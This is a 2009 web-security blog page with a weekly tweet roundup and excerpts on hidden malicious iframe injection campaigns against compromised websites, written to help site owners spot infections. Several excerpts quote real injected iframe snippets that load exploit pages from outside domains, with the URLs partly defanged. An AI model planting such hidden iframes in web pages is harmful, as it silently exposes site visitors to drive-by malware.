Tweet Week: Oct 26 – Nov 1, 2009
Selected short messages and links you might have missed if you don’t follow me on Twitter.
Oct 26, 2009
[link:Sophos blog] New type of hidden malicious iframes
Oct 28, 2009
[milestone] 50 blog posts on http://blog.UnmaskParasites.com (in less than a year)
Security updates are available for Firefox 3/3.5 and Opera 10. Make sure to update your browser ASAP
Oct 30, 2009
I published a “beta” of my Practical Guide to Dealing With Google’s Malware Warnings – need your feedback. Thanks
[link:ottodestruct.com] How to find a backdoor in a hacked WordPress – great article
Oliver Fisher (Google Anti-Malware) on Google’s automates malware scanners and warnings
If you want more real-time experience, you can follow @unmaskparasites on Twitter.
Similar posts:
Buggy Malware: Iframes Eat Web Pages
Yesterday, when I wrote about hidden iframes I forgot to mention one interesting side effect of the new iframes with “onload” scripts – they eat web pages.
Actually, those iframes don’t eat web pages themselves – it is done by buggy software that hackers use to inject hidden iframes into legitimate web pages.
Here’s the story »»
Evolution of Hidden Iframes
Injecting hidden malicious iframes into compromised legitimate websites is one of the most popular types of malware attacks. Invisible iframes allow to silently load exploits from “bad” sites while unsuspecting web surfers browsing visible content of infected websites.
Iframes are rectangular elements of webpages where you can load other web pages either from the same site or from some third party site (in other words: webpage inside a webpage). There are many legitimate uses of iframes. The most common is ad blocks (e.g. Google displays AdSense in iframes)
Hiding iframes
It is said that iframes are rectangular elements and they occupy some space on web pages. So how do hackers make them invisible?
Continue »»
Quicksilver Malware Network
In my latest post about the iframe attack that used free domains from dynamic DNS hosting providers that pointed to a network of compromised dedicated server, I asked readers for any additional information they know about this attack. A few day later I received this email:
Hi there.
Since this may I am watching this network (I named it “quicksilver“) after two PCs/users ran into cn-8080-iframe-modified websites. Using only “white hat” instruments (dig, whois, malzilla, VMWare, google and my brain ;) ) I was able to collect information about the basic frame of this network.
It is not a simple botnet – it combines three networks with different functions to form a “malware superstructure”.
Nearly everything in this network is constantly moving (thus the name) and uses compromised machines acting as proxies or slaves. The machines of the real black hats are movable themselves – the older “gumblar” network (which i think is a precursor to quicksilver) used an ukrainian c&c-server with a different ip address.
At the end of the email, the reader said that he had a chart of this network and asked me if I wanted to take a look at it. The information looked interesting so I asked if he would like to publish it on my blog and got his permission:
you have my explicit permission to publish everything I send you – anonymously. Although I have a name and a title, the only thing relevant is to unmask those networks.
So here it is. I’ve published the story as is. I just added some formatting and converted the chart to GIF format to avoid PDF security concerns.
Continue »»
Dynamic DNS and Botnet of Zombie Web Servers
It’s always interesting to watch how malware attacks evolve over time.
Since this spring, when I started to distinguish it from other attacks, this hidden iframe injection attack has always been among “leaders”.
- They started with gambling-related .cn domains (like cheapslotplay .cn).
- They introduced several new domains names every day so that you couldn’t hardcode them in your scanners. At this point, my records contain several hundred domains used in this attack.
- They also changed campaign names (parameters they specify in iframe URLs) regularly: mozila, banner, cocacola, pepsi, open, reopen, income.
- They used port 8080 (presumably to game dumb traffic filters that only inspect traffic on port 80).
- In the end of July, they started to use 3-letter .ru, .pl, .in and .at domains (e.g. x3y .ru, f7y .at, q5n .in, a3j .pl).
- And, finally, if you follow me on Twitter, you know that this week I started to notice 3rd-level domains registered with free dynamic DNS services.
Hidden CN Iframes Are Still Prevalent
This post is a reminder that .cn iframe attacks are still among leaders.
The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.
Port 8080
Since the pepsi campaign they started using port 8080 in the URLs.
The currently form of the malicious code looks like this
< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
It is usually injected at the bottom of index (home) pages.
Continue »»
Another Type of IFrame Hack (PHP Exploit)
This is a quick post about yet another type of hidden iframes injected into legitimate web pages.
The HTML code may look like this:
<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Domain names may vary, and the number of different iframes injected into a single web page may be different. The distinguishing feature of this exploit is the “?click=<hex_number>” part of the URL, where <hex_number> is some hexadecimal number.
Continue »»
Malicious “Income” IFrames from .CN Domains
New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.
The html code looks like this
<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150. The iframes load pages with paths similar to “in.cgi?incomeNN”, where NN is some arbitrary number.
Continue »»
About this blog
Occasional posts from the developer of
Unmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).
Exploit reviews, security tips, and all that jazz.
